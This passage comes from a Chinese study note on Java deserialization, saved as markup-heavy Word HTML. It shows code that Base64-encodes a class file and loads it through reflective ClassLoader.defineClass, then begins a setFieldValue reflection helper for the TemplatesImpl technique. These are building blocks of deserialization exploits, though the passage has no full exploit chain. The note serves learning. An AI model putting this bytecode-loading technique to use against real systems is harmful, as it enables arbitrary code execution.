style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">byte</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">file</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">length</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">()];</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>in</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">read</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">content</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">System</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">out</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">println</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">Base64</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">encode</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">content</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">));</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Method</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> defineClass </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ClassLoader</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getDeclaredMethod</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"defineClass"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">byte</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[].</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>defineClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">setAccessible</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">true</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">//byte[] code = Base64.decode(content);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">byte</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">[]</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> code </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> content</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> hello </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Class</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">)</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">defineClass</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">invoke</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">ClassLoader</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">getSystemClassLoader</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(),</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'StringTok';color: #4070A0;font-family: Consolas;">"org.test.ser.Hello"</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">code</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">0</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">code</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">length</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">);</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">        </span>hello</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'FunctionTok';color: #06287E;font-family: Consolas;">newInstance</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">();</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span></p><p><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">注意根据class文件的全限定路径名需要根据自己写的包名修改，不然会报错</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">我的目录结构如下</span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;"></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">下面的TemplatesImpl使用的工具类的setFieldValue，一开始以为是某个lib库中的方法，后来发现是spring的工具类，我这里感觉没有必要起spring，就把源码自己写在一个类中然后去引用</span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">package</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;"> org</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">test</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">ser</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">import</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">java</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">lang</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ImportTok';color: #008000;font-weight: bold;font-family: Consolas;">reflect</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">.*;</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              

              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/**</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">反射的</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> Utils </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Cambria;">函数集合</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="font-family:Cambria;">              </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">*</span></span></span><span style="mso-bookmark:java反序列化笔记;"><span style="mso-bookmark:java字节码;"><span style="mso-style-parent: 